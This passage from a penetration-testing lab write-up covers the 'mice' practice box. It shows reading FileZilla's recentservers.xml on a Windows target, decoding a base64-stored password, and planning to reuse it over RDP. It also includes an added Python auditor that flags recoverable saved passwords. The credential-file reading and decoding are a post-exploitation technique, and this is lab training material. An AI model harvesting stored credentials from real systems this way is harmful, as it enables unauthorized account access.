FileZilla


The target system has FileZilla installed.

PS C:\Users\divine\AppData\Roaming\FileZilla> ls
 
 
    Directory: C:\Users\divine\AppData\Roaming\FileZilla
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         12/6/2021   8:40 PM          18963 filezilla.xml                                                        
-a----         12/6/2021   8:40 PM            451 layout.xml                                                           
-a----         12/6/2021   8:40 PM          28672 queue.sqlite3                                                        
-a----         12/6/2021   8:40 PM            458 recentservers.xml                                                    
 
PS C:\Users\divine\AppData\Roaming\FileZilla> cat recentservers.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
	<RecentServers>
		<Server>
			<Host>ftp.pg</Host>
			<Port>21</Port>
			<Protocol>0</Protocol>
			<Type>0</Type>
			<User>divine</User>
			<Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
			<Logontype>1</Logontype>
			<PasvMode>MODE_DEFAULT</PasvMode>
			<EncodingType>Auto</EncodingType>
			<BypassProxy>0</BypassProxy>
		</Server>
	</RecentServers>
</FileZilla3>

The FileZilla client stores saved credentials in the recentservers.xml file. The password is only base64-encoded, so it can be decoded directly.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ echo -n Q29udHJvbEZyZWFrMTE= | base64 -d
ControlFreak11
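
To audit a workstation for this exposure, the following added example (not part of the original writeup) parses a FileZilla XML file and reports which server entries hold a recoverable password, without printing the password itself. The sample XML and the function name are constructed for illustration; treating a Pass element with no encoding attribute as plain text is an assumption.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Constructed sample in the same layout as the recentservers.xml shown above;
# host, user and password values are made up for this example.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
<RecentServers>
<Server><Host>ftp.example.test</Host><User>alice</User>
<Pass encoding="base64">RXhhbXBsZVBhc3Mx</Pass></Server>
<Server><Host>files.example.test</Host><User>anonymous</User></Server>
</RecentServers>
</FileZilla3>
"""

def audit_filezilla_xml(xml_text):
    """Return one finding per <Server> entry; the password is never returned."""
    if isinstance(xml_text, str):
        xml_text = xml_text.encode("utf-8")
    findings = []
    for server in ET.fromstring(xml_text).iter("Server"):
        status = "no stored password"
        pass_el = server.find("Pass")
        value = (pass_el.text or "").strip() if pass_el is not None else ""
        if value:
            encoding = pass_el.get("encoding")
            if encoding == "base64":
                try:
                    base64.b64decode(value, validate=True)
                    status = "recoverable (base64 is encoding, not encryption)"
                except (binascii.Error, ValueError):
                    status = "malformed base64 value"
            elif encoding is None:
                # Assumption: no encoding attribute means the value is plain text.
                status = "recoverable (plain text)"
            else:
                status = "stored with encoding=%r, review manually" % encoding
        findings.append({"host": server.findtext("Host", default=""),
                         "user": server.findtext("User", default=""),
                         "status": status})
    return findings

if __name__ == "__main__":
    for finding in audit_filezilla_xml(SAMPLE_XML):
        print(finding["host"], finding["user"], finding["status"], sep=" | ")
```

Entries reported as recoverable are candidates for removal from the client's saved data and for a password change on the server side.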

The password might belong to the current user, divine. Validating against the target RDP server.